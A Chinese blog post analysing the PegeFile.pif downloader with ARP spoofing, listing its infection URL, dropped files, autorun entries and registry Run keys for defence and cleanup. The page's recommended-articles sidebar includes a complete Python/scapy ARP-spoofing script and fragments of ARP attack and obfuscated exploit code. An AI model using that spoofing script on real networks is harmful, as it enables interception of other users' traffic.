强悍的PegeFile.pif(下载者+ARP欺骗)分析

最新推荐文章于 2024-06-24 10:19:11 发布
原创 最新推荐文章于 2024-06-24 10:19:11 发布 · 1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#system #磁盘 #c

本文描述了一种中毒后的现象,包括下载大量木马、ARP欺骗等,并详细列出了病毒产生的特征文件及其在系统中的分布位置,同时给出了受影响的注册表项。
中毒后的现象:
1)下载N多木马,
2)ARP欺骗了,局域网内的其他电脑上网时,都会先访问hxxp://www.369678.cn/ppp.html,下载病毒。

隐藏的有点诡异,
产生的文件:
1) 每个磁盘分区下都有这两个文件:
    autorun.inf
    PegeFile.pif
2) 其他文件
c:/windows/
   TIMHost.exe
   NVDispDrv.exe
c:/windows/system32/
   TIMHost.dll
   NVDispDrv.dll
   visin.exe
   ztkini.dll
   jzfini.dll
   xyfini.dll
   zxgini.dll
c:/windows/system32/drivers/
   scvhost.exe
   svchost.exe
C:/Program Files/Internet Explorer/PLUGINS/
   NewTemp.bak
   NewTemp.bbk
   NewTemp.dl
   System64.Jmp
   System64.Sys
C:/Documents and Settings/Administor/Local Settings/Temp/
   1.exe
   2.exe
   ...
   15.exe
   rxso.exe
   rxso0.dll
   tlso.exe
   tlso0.dll
   qjso.exe
   qjso0.dll
   daso.exe
   daso0.dll
   wlso.exe
   wlso0.dll
   wgso.exe
   wgso0.dll

还有注册表部分:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
    KVP
    NVDispDrv
    qjsa
    rxsa
    TIMHost
    tlsa
    wdsa
    wgsa
    wlsa 
网络工程师必修课之ARP MAC欺骗,交换机静态ARP绑定配置
Bert_Wang的博客
05-23 1860
静态ARP绑定及MAC地址绑定
【C++软件调试技术】使用Windbg分析软件异常时的诸多细节与技巧总结
热门推荐
dvlinker的技术专栏
07-27 8万+
使用 Windbg 分析软件异常时的诸多细节与技巧总结
Gtk-ERROR : GTK+ 2.x symbols detected. Using GTK+2.x and GTK+3 in the same process is not support
GungnirsPledge的博客
11-26 9637
Gtk-ERROR **: GTK+ 2.x symbols detected. Using GTK+ 2.x and GTK+3 in the same process is not support报错:形式1:形式2:原因报错的一般复现解决方案参考文献 程序员遇到这种环境问题的时候前列腺都不好, 记录一下, 方便以后回查~ 报错: 报错有两种形式 形式1: Gtk-ERROR **: GTK+ 2.x symbols detected. Using GTK+ 2.x and GTK+3 in the
Vue.js+Mysq+java+springboot+商品推荐算法实现商品推荐网站+商品管理系统后台
tinyfox_z的博客
07-01 4万+
本程序基于前后端分离开发模式,搭建系统网络商品推荐系统前台与系统后台商品管理系统,通过可以配置的方式一体化管理商品信息,推送商品内容,生成丰富的可视化统计分析。源码http。
python编程求1!+2!++n!_python计算阶乘和的方法(1!+2!+3!+...+n!)
weixin_39791653的博客
11-21 2万+
python计算阶乘和的方法(1!+2!+3!+...+n!)更新时间:2019年02月01日 08:50:15 作者:一米阳光里的晴天娃娃今天小编就为大家分享一篇python计算阶乘和的方法(1!+2!+3!+...+n!),具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧方法一:使用while循环来计算n = int(input())jie = 1sum = 0i = 1wh...
在linux下使用c语言实现ARP欺骗
Arnold的专栏
05-20 2269
局域网内ARP欺骗已经不是个新鲜的话题,且现在无论主机还是网络设备,对ARP欺骗的防范能力已经大大增强。使用C实现的主要目的在于对linux下socket编程加深理解。    发送ARP包自然少不了对数据链路层的直接操作, linux下有多种方式,下面代码依据AF_PACKET实现。具体代码如下:   arp_attack.h #ifndef _ARP_ATTACK_H
python 求阶乘之和。求1+2!+3!+...+20!的和
weixin_34044273的博客
06-27 1万+
阶乘:也是数学里的一种术语;阶乘指从1乘以2乘以3乘以4一直乘到所要求的数;在表达阶乘时,就使用“!”来表示。如h阶乘,就表示为h!;阶乘一般很难计算,因为积都很大。 一、参考解法: 分析:1、阶乘的计算:用递归函数实现是比较好的方案,先定义一个递归函数实现求阶乘功能。 def recursion(n): #'定义递归函数实现求阶乘功能' if n==1: ...
Node.js+Express+MySql实现用户登录注册
Coder_py的博客
07-09 1万+
Node.js+Express+MySql实现用户登录注册 IDE:WebStorm 工程目录: 数据库表 Login.js: /** * Created by linziyu on 2017/7/8. */ /** * express接收html传递的参数 */ var express=require('express');
VUE之命令行报错:Component template should contain exactly one root element. If you are using v-if on multi
weixin_45626433的博客
03-31 1万+
从文字翻译上来讲,其实Component template should contain exactly one root element. If you are using v-if on multiple elements, use v-else-if to chain them instead这句话已经讲的很明白了,直译出来 就是:组件模板应该包含一个根元素。如果在多个元素上使用V-IF,则使用V-ELS-IF来链接它们。 但是这么说依然让新手有点摸不着头脑,其实就是说在模版里只能有一个主div(根
Vue.js条件渲染指令v-if及v-show
m0_61961937的博客
04-21 8834
是真正的条件渲染,因为它会确保在切换过程中条件块内的事件监听器和子组件适当的销毁和重建,v-if也是惰性的,如果在初始渲染时条件为假,则什么都不做,直到第一次变为真时,才会开始渲染条件块。可以看出v-if隐藏的内部元素不会被显示,Vue.js不会尝试生成对应的html代码,而v-show是通过css的display:none来控制的。一般来说,v-if每次插入或者移除元素时都必须生成元素内部的DOM树,因此具有更高的切换开销,而v-show有更高的初始渲染开销。值得注意的是,v-show。
FFmpeg下载+使用
计算机小白
06-24 8423
下载和使用ffmpeg
jquery.validate.js 1.8.1 + 实例
07-13
通过学习和分析这些示例,开发者可以更好地理解和应用 `jQuery Validate` 插件。 ### 结论 `jQuery Validate` 1.8.1 版本为前端开发人员提供了一套强大且灵活的工具,用于验证用户输入的数据。这个库易于使用,可...
Python 协议攻击脚本(): ARP欺骗 Arpspoof
酉酉的博客
04-28 3625
ARP arp协议 ARP(Address Resolution Protocol)即地址解析协议, 用于实现从 IP 地址到 MAC 地址的映射,即询问目标IP对应的MAC地址,位于数据链路层。 arp欺骗 ARP欺骗ARP spoofing),又称ARP毒化(ARP poisoning),通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MA...
Sality.q病毒变种之EXE感染方式分析
04-10 1355
/* Sality.q病毒变种之EXE感染方式分析 * 文件名:vcmgcd32.dll * MD5:ae22ca9f11ade8e362254b452cc07f78 * 壳:未加 * By Vincent.peng on 2008.04.08 */调试方法:在Fun为10003FF0的CreateThread断下,然后转EIP到10003FF0处。一、感染过程分析:1 保存文件属性、时间。2 设
com/lsass.exe smss.exe(磁碟机病毒) 感染方式之我分析 -- 2008第一博
01-08 995
    为XXX研究所提供技术支持时截获的样本,com/lsass.exe smss.exe,病毒中文名为磁碟机病毒,貌似很强,此等病毒岂能错过,分析之,不感独乐,遂将感染方式贴上:感染文件类型:(文件全名后三位)1 .htm, tml, .js2 .exe3 .rar, .zipweb文件感染函数:1 按行读取web文件内容2 如果没有找到匹配的:document.write(""); 则在文件
Windows自动启动归纳:
04-30 858
Windows自动启动归纳:一、Run键值实现 1. HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run    HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnce    HKEY_LOCAL_MACHINE/SOFTWARE/Micro
sysload3.exe 感染型病毒分析
04-06 837
sysload3.exe分析结果:一、基本信息MD5:e1c174d72cca73ade18c72772d840794 二、病毒特征 感染型病毒,可通过局域网、软盘、U盘传播。该样本主要感染文件类型为.exe,且文件大小介于10K 和 10M 的文件。三、病毒现象 1 创建自启动项: HKEY_CURRENT_USER/Software/Microsoft/W
一段加密的Javascript风险代码
10-19 831
一段加密的Javascript风险代码,利用IE及其插件漏洞传播病毒:var vDA1 = new window["/x44/x61/x74/x65"]()//datevDA1["/x73/x65/x74/x54/x69/x6d/x65"](vDA1["/x67/x65/x74/x54/x69/x6d/x65"]() + 24*60*60*1000)//setTime getTimevar eOT
python arp 欺骗代码
最新发布
11-09
以下是一个较为完整的Python实现ARP欺骗的代码,包含ARP欺骗和恢复ARP表的功能: ```python import sys import time from scapy.all import ARP, Ether, srp, sendp def get_mac(ip): # 创建一个ARP请求包 arp = ARP(pdst=ip) # 创建一个以太网帧 ether = Ether(dst="ff:ff:ff:ff:ff:ff") # 组合以太网帧和ARP请求包 packet = ether / arp # 发送数据包并接收响应 result = srp(packet, timeout=3, verbose=0)[0] if result: return result[0][1].hwsrc else: return None def arp_spoof(target_ip, spoof_ip): target_mac = get_mac(target_ip) if target_mac is None: print(f"无法获取 {target_ip} 的MAC地址。") return # 创建ARP欺骗数据包 arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, op=2) # 发送ARP欺骗数据包 sendp(arp_response, verbose=0) def restore_arp(target_ip, source_ip): target_mac = get_mac(target_ip) source_mac = get_mac(source_ip) if target_mac is None or source_mac is None: print("无法获取MAC地址,无法恢复ARP表。") return # 创建恢复ARP表的数据包 arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=source_ip, hwsrc=source_mac, op=2) # 发送恢复ARP表的数据包 sendp(arp_response, verbose=0) if __name__ == "__main__": if len(sys.argv) != 3: print("用法: python arp_spoof.py <目标IP> <伪装IP>") sys.exit() target_ip = sys.argv[1] spoof_ip = sys.argv[2] try: sent_packets_count = 0 while True: arp_spoof(target_ip, spoof_ip) arp_spoof(spoof_ip, target_ip) sent_packets_count = sent_packets_count + 2 print(f"\r[+] 已发送的数据包: {str(sent_packets_count)}", end="") time.sleep(2) except KeyboardInterrupt: print("\n[-] 检测到 Ctrl+C ,正在恢复ARP...") restore_arp(target_ip, spoof_ip) restore_arp(spoof_ip, target_ip) print("ARP表已恢复。") ``` ### 代码解释 1. **`get_mac` 函数**:用于获取指定IP地址对应的MAC地址。通过发送ARP请求包并接收响应来获取MAC地址。 2. **`arp_spoof` 函数**:构造ARP欺骗数据包并发送,将目标主机的ARP表项修改为攻击者的MAC地址。 3. **`restore_arp` 函数**:构造恢复ARP表的数据包并发送,将目标主机的ARP表项恢复为正确的MAC地址。 4. **主程序**:通过命令行参数获取目标IP和伪装IP,循环发送ARP欺骗数据包,直到用户按下 `Ctrl+C` ,然后恢复ARP表。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值